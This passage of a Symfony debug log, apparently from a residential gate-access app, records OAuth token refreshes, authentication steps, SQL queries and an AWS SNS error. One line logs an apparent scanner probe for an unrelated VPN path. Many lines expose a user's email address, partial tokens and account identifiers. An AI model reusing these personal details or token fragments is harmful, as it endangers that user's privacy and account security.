  5994. [2025-12-20 01:11:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  5995. [2025-12-20 01:13:41] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  5996. [2025-12-20 01:13:41] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  5997. [2025-12-20 01:13:41] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["e150f29e1a2b6ef57e5b887f1b [...]"] []
  5998. [2025-12-20 01:13:41] doctrine.DEBUG: "START TRANSACTION" [] []
  5999. [2025-12-20 01:13:41] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"d0bc4f7ba7c10ddb1815706338 [...]","3":"2025-12-20 01:43:41","4":"","5":398,"6":"[]"} []
  6000. [2025-12-20 01:13:41] doctrine.DEBUG: "COMMIT" [] []
  6001. [2025-12-20 01:13:41] doctrine.DEBUG: "START TRANSACTION" [] []
  6002. [2025-12-20 01:13:41] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"3d8ae38adb2908af83e0a5c5e4 [...]","3":"2026-02-18 01:13:41","4":"","5":398,"6":"[]"} []
  6003. [2025-12-20 01:13:41] doctrine.DEBUG: "COMMIT" [] []
  6004. [2025-12-20 01:13:41] doctrine.DEBUG: "START TRANSACTION" [] []
  6005. [2025-12-20 01:13:41] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"e150f29e1a2b6ef57e5b887f1b [...]"] []
  6006. [2025-12-20 01:13:41] doctrine.DEBUG: "COMMIT" [] []
  6007. [2025-12-20 01:13:42] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  6008. [2025-12-20 01:13:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6009. [2025-12-20 01:13:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6010. [2025-12-20 01:13:42] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6011. [2025-12-20 01:13:42] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6012. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6013. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6014. [2025-12-20 01:13:42] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6015. [2025-12-20 01:13:42] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6016. [2025-12-20 01:13:42] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6017. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  6018. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  6019. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  6020. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  6021. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6022. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  6023. [2025-12-20 01:13:42] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6024. [2025-12-20 01:13:42] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
  6025. [2025-12-20 01:13:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6026. [2025-12-20 01:13:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6027. [2025-12-20 01:13:42] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6028. [2025-12-20 01:13:42] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6029. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6030. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6031. [2025-12-20 01:13:42] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6032. [2025-12-20 01:13:42] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6033. [2025-12-20 01:13:42] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6034. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6035. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6036. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6037. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  6038. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
  6039. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  6040. [2025-12-20 01:13:42] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  6041. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6042. [2025-12-20 01:13:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6043. [2025-12-20 01:13:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6044. [2025-12-20 01:13:42] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6045. [2025-12-20 01:13:42] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6046. [2025-12-20 01:13:42] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6047. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6048. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6049. [2025-12-20 01:13:42] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6050. [2025-12-20 01:13:42] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6051. [2025-12-20 01:13:42] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6052. [2025-12-20 01:13:42] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
  6053. [2025-12-20 01:13:42] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>77a869a9-ff34-5e79-965d-081605b2cfe9</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>77a869a9-ff34-5e79-965d-081605b2cfe9</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  6054. [2025-12-20 01:13:42] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6055. [2025-12-20 01:13:47] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/c95c459d-212c-4555-98e9-59cee00445e5/providers","method":"GET"} []
  6056. [2025-12-20 01:13:47] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6057. [2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6058. [2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6059. [2025-12-20 01:13:47] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6060. [2025-12-20 01:13:47] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6061. [2025-12-20 01:13:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6062. [2025-12-20 01:13:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6063. [2025-12-20 01:13:47] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6064. [2025-12-20 01:13:47] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6065. [2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6066. [2025-12-20 01:13:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6067. [2025-12-20 01:13:47] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6068. [2025-12-20 01:13:47] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6069. [2025-12-20 01:13:47] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6070. [2025-12-20 01:13:47] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  6071. [2025-12-20 01:13:53] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  6072. [2025-12-20 01:13:53] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  6073. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6074. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6075. [2025-12-20 01:13:53] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  6076. [2025-12-20 01:13:53] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  6077. [2025-12-20 01:13:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6078. [2025-12-20 01:13:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6079. [2025-12-20 01:13:53] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6080. [2025-12-20 01:13:53] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6081. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d0bc4f7ba7c10ddb1815706338 [...]"] []
  6082. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  6083. [2025-12-20 01:13:53] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6084. [2025-12-20 01:13:53] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6085. [2025-12-20 01:13:53] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6086. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  6087. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  6088. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  6089. [2025-12-20 01:13:53] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
